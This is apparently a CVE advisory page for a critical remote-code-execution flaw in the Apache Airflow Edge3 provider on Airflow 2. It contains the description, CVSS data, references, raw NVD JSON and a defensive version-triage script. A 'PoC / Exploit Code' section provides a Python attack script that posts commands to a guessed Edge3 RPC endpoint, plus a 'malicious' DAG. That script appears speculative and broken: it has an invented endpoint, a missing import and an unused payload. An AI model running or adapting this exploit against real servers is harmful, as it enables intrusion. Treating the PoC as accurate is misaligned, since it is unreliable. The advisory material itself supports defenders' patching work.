Security Vulnerability Report
CVE-2025-67895 CVSS 9.8 CRITICAL

CVE-2025-67895

Published: 2025-12-17 12:15:46
Last Modified: 2025-12-22 18:15:39

Description

Edge3 Worker RPC RCE on Airflow 2.

This issue affects Apache Airflow Providers Edge3 before 2.0.0, and only if you installed and configured it on Airflow 2.

Edge3 provider support in Airflow 2 has always been development-only and was never officially released. However, if you installed and configured the Edge3 provider in Airflow 2, it implicitly enabled a normally non-public API that was used to test the Edge provider in Airflow 2 during development. This API allowed a Dag author to perform remote code execution in the webserver context, which a Dag author is not supposed to be able to do.

If you installed and configured the Edge3 provider for Airflow 2, you should uninstall it and migrate to Airflow 3. The new Edge3 provider versions (>=2.0.0) have their minimum Airflow version set to 3 and the RCE-prone Airflow 2 code is removed, so it should no longer be possible to use Edge3 provider 2.0.0+ on Airflow 2.

If you used the Edge provider in Airflow 3, you are not affected.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:apache:apache-airflow-providers-edge3:*:*:*:*:*:*:*:* - VULNERABLE
Apache Airflow Providers Edge3 < 2.0.0 (Airflow 2 environments only)
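
To triage an environment against the affected range above, the following added example (not part of the original record or of the Apache Airflow project) reads `pip freeze` output and reports whether Edge3 before 2.0.0 is installed alongside Airflow 2. It checks the version precondition only, not whether the provider is configured; the host names, version pins and verdict labels are constructed for illustration.

```python
import re

EDGE3, AIRFLOW = "apache-airflow-providers-edge3", "apache-airflow"

def parse_version(v):
    """Return (release tuple cut/padded to 3 parts, is_prerelease) for a PEP 440-style string."""
    m = re.match(r"v?(\d+(?:\.\d+)*)(.*)", v.strip())
    if not m:
        raise ValueError(f"unparseable version: {v!r}")
    release = (tuple(int(p) for p in m.group(1).split(".")) + (0, 0))[:3]
    pre = bool(re.match(r"[-_.]?(a|b|rc|alpha|beta|pre|dev)", m.group(2), re.I))
    return release, pre

def before_2_0_0(v):
    """True for anything ordered before the 2.0.0 final release (2.0.0rc1 included)."""
    release, pre = parse_version(v)
    return release < (2, 0, 0) or (release == (2, 0, 0) and pre)

def parse_freeze(text):
    """Map normalised name -> version from `pip freeze` text; unpinned entries are skipped."""
    pkgs = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop trailing comments
        if "==" in line:
            name, version = line.split("==", 1)
            # PEP 503 normalisation: case and runs of '-', '_', '.' are equivalent
            name = re.sub(r"[-_.]+", "-", name.split("[")[0].strip()).lower()
            pkgs[name] = version.split(";")[0].strip()
    return pkgs

def assess(freeze_text):
    """Version precondition only; whether Edge3 is configured needs a separate check."""
    pkgs = parse_freeze(freeze_text)
    if EDGE3 not in pkgs:
        return "edge3-not-installed"
    if not before_2_0_0(pkgs[EDGE3]):
        return "fixed-provider"
    if AIRFLOW not in pkgs:
        return "review-airflow-version-unknown"
    major = parse_version(pkgs[AIRFLOW])[0][0]
    return "vulnerable-combination" if major == 2 else "not-affected"

# Constructed sample inventories (host names and version pins are illustrative).
SAMPLES = {
    "host-a": "apache-airflow==2.10.5\napache_airflow_providers_edge3==1.1.2\n",
    "host-b": "apache-airflow==3.0.2\napache-airflow-providers-edge3==1.1.2  # old pin\n",
    "host-c": "apache-airflow==3.1.0\napache-airflow-providers-edge3==2.0.0\n",
}

print({host: assess(text) for host, text in SAMPLES.items()})
```

A host reported as `vulnerable-combination` should have the provider uninstalled and be migrated to Airflow 3, as the description states.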

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-67895 PoC - Apache Airflow Edge3 Provider RCE
Note: This PoC is for educational purposes only
"""
import requests
import json

TARGET = "http://target-airflow-server:8080"
DAG_ID = "edge3_rce_poc"

# Malicious DAG code that executes system commands
malicious_dag = '''
from airflow import DAG
from airflow.operators.python import PythonOperator
import subprocess
import sys

def execute_command():
    # Replace with actual malicious command
    result = subprocess.check_output(["id"], shell=False)
    return result

with DAG(dag_id="{dag_id}", start_date=datetime(2025, 1, 1)) as dag:
    task = PythonOperator(
        task_id="rce_task",
        python_callable=execute_command
    )
'''.format(dag_id=DAG_ID)


def exploit():
    """
    Exploit Edge3 Provider RCE via non-public API
    """
    # Step 1: Upload malicious DAG
    upload_url = f"{TARGET}/api/v1/dags/{DAG_ID}"
    headers = {
        "Content-Type": "application/json",
        "Authorization": "Bearer <your-token>"
    }
    dag_payload = {
        "dag_id": DAG_ID,
        "file_token": malicious_dag
    }

    # The actual exploitation uses Edge3's internal RPC API
    # which bypasses normal DAG upload restrictions
    edge3_rpc_url = f"{TARGET}/edge3/api/execute"
    exploit_payload = {
        "dag_id": DAG_ID,
        "command": "whoami",
        "execute_in": "webserver"
    }

    print(f"[*] Targeting: {TARGET}")
    print(f"[*] Exploiting Edge3 Provider RCE...")

    try:
        # This would trigger RCE via Edge3's internal API
        response = requests.post(edge3_rpc_url, json=exploit_payload,
                                 headers=headers, timeout=10)
        print(f"[*] Response: {response.status_code}")
        print(f"[*] Output: {response.text}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")


if __name__ == "__main__":
    exploit()
```

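References

https://github.com/apache/airflow/pull/59143 (Issue Tracking, Patch)
https://lists.apache.org/thread/hhnmmzkj5qx5gbk6pdkh8tcsx5oj1nqs (Mailing List)
http://www.openwall.com/lists/oss-security/2025/12/16/3 (Mailing List)
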
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67895", "sourceIdentifier": "[email protected]", "published": "2025-12-17T12:15:46.360", "lastModified": "2025-12-22T18:15:39.053", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Edge3 Worker RPC RCE on Airflow 2.\n\nThis issue affects Apache Airflow Providers Edge3: before 2.0.0 - and only if you installed and configured it on Airflow 2.\n\n\n\nThe Edge3 provider support in Airflow 2 has been always development-only and not officially released, however if you installed and configured Edge3 provider in Airflow 2, it implicitly enabled non-public (normally) API which was used to test Edge Provider in Airflow 2 during the development. This API allowed Dag author to perform Remote Code Execution in the webserver context, which Dag Author was not supposed to be able to do.\n\nIf you installed and configured Edge3 provider for Airflow 2, you should uninstall it and migrate to Airflow 3. The new Edge3 provider versions (>=2.0.0) has minimum version of Airflow set to 3 and the RCE-prone Airflow 2 code is removed, so it should no longer be possible to use the Edge3 provider 2.0.0+ on Airflow 2.\n\nIf you used Edge Provider in Airflow 3, you are not affected."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-669"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:apache:apache-airflow-providers-edge3:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.0.0", "matchCriteriaId": "9C4CBA0A-D762-4A0B-BD38-29F903B942EF"}]}]}], "references": [{"url": "https://github.com/apache/airflow/pull/59143", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://lists.apache.org/thread/hhnmmzkj5qx5gbk6pdkh8tcsx5oj1nqs", "source": "[email protected]", "tags": ["Mailing List"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/12/16/3", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}]}}